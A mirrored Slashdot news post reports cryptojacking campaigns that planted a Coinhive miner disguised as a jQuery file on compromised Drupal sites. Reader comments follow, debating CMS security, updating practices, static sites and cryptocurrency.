Slashdot Mirror

← Back to Stories (view on slashdot.org)

Drupal Sites Fall Victims To Cryptojacking Campaigns (bleepingcomputer.com)

Posted by msmash on from the that-escalated-quickly dept.

An anonymous reader shares a report: After the publication of two severe security flaws in the Drupal CMS, cybercrime groups have turned their sights on this web technology in the hopes of finding new ground to plant malware on servers and make money through illegal cryptocurrency mining. [...] Now, as time passes by, more malware campaigns targeting Drupal sites are getting off the ground -- and two of them have been spotted the past week.

The most recent of these campaigns has been discovered by US security researcher Troy Mursch. The researcher discovered a group that gained access to Drupal sites and hid a version of the Coinhive in-browser cryptocurrency miner inside a file named "jquery [dot] once [dot] js?v=1.2," loaded on each of the compromised sites. Mursch initially tracked down the infected files to over 100,000 domains, then narrowed down the results to 80,000 domains, and finally confirmed the infection on at least 348 sites where the in-browsing mining operation was actually taking place.

27 comments

  1. You work for me now by Anonymous Coward · · Score: 1

    This is why I only use Wordpress on my important sites

    1. Re:You work for me now by pahles · · Score: 4, Informative

      https://www.cvedetails.com/vul...

      --
      Sig?
    2. Re:You work for me now by Anonymous Coward · · Score: 0

      It's more interesting to look at the chart comparing vulnerabilities by year. Both have had some major spikes over the years.

      https://www.cvedetails.com/pro...

      https://www.cvedetails.com/pro...

      The difference is, Drupal is guilty of being insecure over generations. The vulnerabilities being reported go back to d5, and the original commits are by people who are no longer in the community.

      Anyone running anything below d7 probably does not put much work into maintaining their website, creating this huge garden for bad elements to play in. One of the other things is the update module - which is shipped starting with Drupal 6 - is likely turned off if you don't care about maintaining your website. Which means the Drupal team doesn't know how big a problem they have created.

      Drupal 8's architecture is integrated with Symfony, which has it's own set of issues.

      https://www.cvedetails.com/pro...

      While the number of issues may seem low by comparison, they are mostly code execution vulnerabilities.

      So, there's a team of CMS developers, who have been building insecure systems for years and now have a huge set of malware sites built on their platform that no one can do much about. Despite that track record, their Core development team is being trusted with integrating a complex PHP framework known for code execution vulnerabilities.

      What's not to love about this situation?

    3. Re:You work for me now by Anonymous Coward · · Score: 0

      What's not to love about this situation?

      Yeah, but it's cheap and Americans are used to being hacked all the time now and having no privacy. As long as their competitors are no better the business doesn't care.

  2. If one goes open source PHP... by TheZeitgeist · · Score: 1

    They get what they deserve.

    1. Re: If one goes open source PHP... by Aethedor · · Score: 1

      Try this one.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
    2. Re: If one goes open source PHP... by Anonymous Coward · · Score: 0

      They can't even be bothered to spell/grammar check their web site. What makes you think they can write reliable, bug free and secure code?

    3. Re: If one goes open source PHP... by Aethedor · · Score: 1

      If that's really all the criticism you can give. the Banshee developer did a good job.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
    4. Re: If one goes open source PHP... by Anonymous Coward · · Score: 0

      Sorry, it's not very good.

      It seems to do very little to make sure that code written on top of it is secure. Here are the sum-total of the security features I can see:

      • There's a (really bad) static analyser for SQL Injections. It can be tricked because parsing code with regexes doesn't work.
      • I *think* that it prevents XSS by virtue of it's view scripting being a really verbose chain of PHP method calls (but I can't tell for sure)

      That is all. I can't see anything on the website that lists how great it is for security besides "we've audited it". That's nice and all but if there's a security bug in a framework, it'll get updated and then I'll install the update. A security bug in the code I'm responsible for? That probably won't get found by anyone except a neer-do-well. How does this make that more secure? How does it prevent me from triggering one of the many security footguns in (PHP) web development?

      I'd personally recommend just using Symfony or Laravel instead. People are looking at them for security vulns and they have actual features that prevent you from doing dumb things.

    5. Re: If one goes open source PHP... by Aethedor · · Score: 1

      Sorry, but this 'review' makes no sense at all. Your 'sum-total of the security features'... I have no idea what you looked at, but you clearly didn't look at Banshee. Or at least, not in a serious way.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
  3. SJW culture a contributing factor ? by Anonymous Coward · · Score: 0

    I wonder if the talented people who can write secure software have all been turned off by all the SJW stuff that this project thrives on and hence do not want to contribute to making it secure ?

  4. Hell of a file name by Anonymous Coward · · Score: 0

    inside a file named "jquery [dot] once [dot] js?v=1.2," That is one hell of a file name..

  5. Drupal needs one click updating for core. by cascadingstylesheet · · Score: 1

    Drupal needs one click updating for core.

    (Optional) autoupdating would be even better. But at least one click is a minimum these days. The manual screwing around that you have to do to update Drupal is absurd.

    (Not difficult, just absurd. It's because it isn't difficult that it's absurd that it isn't automated.)

    1. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 0

      Nah, it's often difficult as well, because most of the touted functionality of Drupal comes from custom modules, which are often badly written - meaning updates fuck things up hardcore.

      Of course, that's what a QA environment is for, but ain't nobody want to pay for proper QA.

    2. Re:Drupal needs one click updating for core. by thaylin · · Score: 1

      And then you get updates like confluence where you have to make backups of the conf files because it likes to blow them away.

      --
      When you cant win, ad hominem.
    3. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 1

      I think it is immensely dangerous to have that feature. The last thing I want is for the executable and configs and everything to be writable to the process running them. That is just begging for escalation of attacks.

    4. Re:Drupal needs one click updating for core. by drinkypoo · · Score: 1

      I think it is immensely dangerous to have that feature. The last thing I want is for the executable and configs and everything to be writable to the process running them. That is just begging for escalation of attacks.

      You're totally correct, but they could have a simple script that you'd run, assuming you can do such things, that would do the job for you. Though, to be fair, it's not exactly complicated. Extract the archive and rsync it. Then you do have to run db updates, but that could be done by the update script easily enough.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    5. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 0

      At that point, just setup unattended-upgrades or AutoUpdate or your distro's equivalent. Most can even be set to restart the daemons, restart the machine, and send the admin a nice email all in one, if you want the above.

  6. That's harsh by Hognoxious · · Score: 1

    On top of already being victims just by having Drupal.

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  7. Turnkey again! by duke_cheetah2003 · · Score: 1

    And we're back here again, pointing out why Turnkey solutions for internet connected servers is BAD NEWS!

    1. Re:Turnkey again! by Anonymous Coward · · Score: 0

      And we're back here again, pointing out why Turnkey solutions for internet connected servers is BAD NEWS!

      Are people supposed to develop each their own website/framework in their own corner and never share?

    2. Re:Turnkey again! by yelvington · · Score: 1

      Because it's much better to have bespoke security holes?

    3. Re:Turnkey again! by Anonymous Coward · · Score: 1

      Because it's much better to have bespoke security holes?

      Actually yes because nobody is going to waste their time cracking the bespoke site for your small business. The returns are too low for their investment of time and they get exactly one infection out of the deal. The thing that makes turnkey content management systems attractive is precisely the large base of installed users who don't patch their installs regularly after the consultants who set it all up for them leave or have a falling out with the business owner. It's not unusual to have thousands or even tens of thousands of potential targets running Drupal, WordPress or Joomla installations that haven't been patched in 5 years or more. Suddenly a breach in one of these shake-and-bake website tools is much more attractive because of the much larger pool of potential victims. Crypto currency mining sweetens the pot because you don't have to find a site that's taking payments to make money. All you need are unwitting visitors to the web site whose browsers can be hijacked to mine Monero or some other crypto coins.

  8. All so-called cryptocurrencies are Ponzi Scams by Anonymous Coward · · Score: 0

    Are (any) fiat-currency and (any) cryptocurrency really equivalent, as cryptocurrency fans claim?
    For example, US Dollar and Bitcoin are really equals?
    Value/validity/authorization of US dollar is provided/guaranteed by US Government (and in-turn whole US Public)!
    Also, not to mention, US Dollars in any US Bank is insured by US Government!
    What authorization/guarantee/insurance is behind Bitcoin? Nothing!
    Sorry but that is the end of discussion then!

    Why do you think Satoshi Nakamoto is really hiding his identity, if Bitcoin is really such a great innovation?
    He is just someone does not like media/fan attention?
    Or, could it be really because Bitcoin (and all cryptocurrencies followed it) are actually Ponzi Schemes?
    (So he knew very well that law enforcement would come after him sooner or later?!)

    If so-called cryptocurrencies are really good innovation, why they attract so many criminals/criminal activity?
    Could it really be because, all cryptocurrencies themselves are scams, and that is why they attract all kinds of criminals/criminal activity?

    If so-called cryptocurrencies are really currency, why no company/store can use Bitcoin as currency anymore?
    Because the price of Bitcoin proved to be extremely unstable to use as a currency?
    Would the result be different, if Bitcoin replaced by any other "cryptocurrency"?
    Aren't all work the same way?

    If so-called cryptocurrencies are really money; isn't people issuing their own money, illegal already, in all countries?
    If so then, why they are still not banned in all countries?

    Or, they are not actually virtual currency but virtual investment?
    But, if they are actually investment, why we need/want them?
    What would happen to world economy, if people invested in virtual investments, instead of real investments?

    Or, all so-called cryptocurrencies are actually just a modified (made decentralized and paying variable interest) Ponzi Schemes?
    (Price of cryptocurrencies would keep increasing in the long term (by their design), so it is equivalent of paying variable interest to all long term investors.)

    Also, since all so-called cryptocurrencies are actually financial scams (Ponzi Schemes), that means, they cannot be the solution for any of existing financial problems of our world!

    As more and more people invest in cryptocurrencies, it will become harder and harder to ban their trading everywhere (because people invested in cryptocurrencies, would try to stop anyone trying to ban cryptocurrencies)!
    All cryptocurrencies need to be banned globally before it is too late!

    Fools rush-in where angels fear to tread! :-)

  9. Static sites FTW by Tool+Man · · Score: 1

    If you don't leave some leaky, bug-ridden CMS on the front end of your web site, there is a lot less to exploit.
    You can probably do it with some plugin or other with Drupal, just like you can with WordPress, Django or whatever. For most people though, you could do well with a static site generator.

    If there's no exploitable hole in the base OS or web server, good luck having your way with HTML.